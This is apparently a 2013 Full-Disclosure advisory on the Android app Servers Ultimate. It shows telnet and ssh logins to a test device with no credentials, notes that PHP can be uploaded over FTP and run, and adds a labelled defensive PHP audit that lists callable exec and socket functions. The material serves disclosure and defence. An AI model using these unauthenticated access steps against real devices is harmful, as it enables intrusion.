Message-id: <8716F531-64E0-43B6-8A5A-C2750CB743C2@me.com>
Date: Fri, 04 Oct 2013 11:05:36 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: full <full-disclosure@...ts.grok.org.uk>
Subject: Multiple vulnerabilities in Ice Cold Apps Servers Ultimate Version 6.0.2(12) for Android
Multiple vulnerabilities in Ice Cold Apps Servers Ultimate Version 6.0.2(12) for Android
9/8/13
Larry W. Cashdollar, @_larry0
http://www.amazon.com/Ice-Cold-Apps-Servers-Ultimate/dp/B00E00C44G/ref=sr_1_1?s=mobile-apps&ie=UTF8&qid=1378688647
http://www.icecoldapps.com
Vulnerabilities
There are no credentials by default; authentication is disabled for telnet/ssh/ftp, allowing remote access to the device's storage. PHP can be uploaded to the webserver and executed.
• ftp server allows writes to lighttp/php* directory.
• telnet default authentication turned off.
• ssh server default authentication turned off.
• Anonymous SOCKS proxy & http/ftp proxy.
SSHD
larry$ ssh 192.168.0.29 -p 2222
$ id
uid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet)
$ uptime
up time: 19:42:02, idle time: 18:47:19, sleep time: 00:00:00
$
Telnet
larry$ telnet 192.168.0.29 2323
Trying 192.168.0.29...
Connected to 192.168.0.29.
Escape character is '^]'.
Welcome to tel!
Please enter some text to test the connection and hit enter:
$
$ id
uid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet)
$
lighttpd / PHP server
• PHP has the following functions available, enumerated via:
<?php
// Dump every function the interpreter exposes (internal and user-defined).
$arr = get_defined_functions();
echo "<pre>";
print_r($arr);
echo "</pre>";
?>
This returned 1300 functions, including exec(), passthru(), system() and:
[662] => socket_select
[663] => socket_create
[664] => socket_create_listen
[665] => socket_create_pair
[666] => socket_accept
[667] => socket_set_nonblock
[668] => socket_set_block
[669] => socket_listen
[670] => socket_close
[671] => socket_write
[672] => socket_read
[673] => socket_getsockname
[674] => socket_getpeername
[675] => socket_connect
[676] => socket_strerror
[677] => socket_bind
[678] => socket_recv
[679] => socket_send
[680] => socket_recvfrom
[681] => socket_sendto
[682] => socket_get_option
[683] => socket_set_option
[684] => socket_shutdown
[685] => socket_last_error
[686] => socket_clear_error
[687] => socket_import_stream
[688] => socket_getopt
[689] => socket_setopt
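The following check is an added example, not part of the advisory or of the vendor's code: it audits the same exposure from the PHP side, reporting which of the high-risk functions the advisory lists are still callable and emitting the php.ini disable_functions line that would turn them off. The grouping, and the inclusion of shell_exec, proc_open and popen beyond the functions named in the advisory, are this example's own.

```php
<?php
// Added example (not from the advisory): audit which high-risk PHP functions
// an embedded lighttpd/PHP server exposes, and suggest a php.ini hardening line.
// Function names come from the advisory's get_defined_functions() output plus
// a few well-known execution primitives added here as an assumption.
$highRisk = [
    'command execution' => ['exec', 'passthru', 'system', 'shell_exec', 'proc_open', 'popen'],
    'raw sockets'       => ['socket_create', 'socket_create_listen', 'socket_connect',
                            'socket_bind', 'socket_listen', 'socket_accept'],
];

// Everything the interpreter currently defines, as the advisory enumerated it.
$defined  = get_defined_functions()['internal'];
// Functions already blocked by disable_functions (comma-separated in php.ini).
$disabled = array_filter(array_map('trim', explode(',', (string) ini_get('disable_functions'))));

$report = [];
foreach ($highRisk as $group => $names) {
    foreach ($names as $fn) {
        if (in_array($fn, $disabled, true)) {
            $state = 'disabled';
        } elseif (in_array($fn, $defined, true)) {
            $state = 'CALLABLE';
        } else {
            $state = 'absent';   // not compiled into this build
        }
        $report[$group][$fn] = $state;
    }
}

header('Content-Type: text/plain');  // no-op when run from the CLI
$toDisable = [];
foreach ($report as $group => $fns) {
    echo "== $group ==\n";
    foreach ($fns as $fn => $state) {
        printf("  %-22s %s\n", $fn . '()', $state);
        if ($state === 'CALLABLE') {
            $toDisable[] = $fn;
        }
    }
}

// disable_functions is PHP_INI_SYSTEM: it can only be set in php.ini, not via ini_set().
echo "\nSuggested php.ini hardening:\n";
echo 'disable_functions = ' . implode(',', $toDisable) . "\n";
```

Run it from the CLI or drop it in the web root temporarily; any entry marked CALLABLE is reachable by whatever can upload PHP to the server, which on this app includes the unauthenticated FTP service.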
Vendor Notified: 9/10/2013
The full list is here:
http://vapid.dhs.org/advisories/ultimate-server-android-vulns.html
-- Larry
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/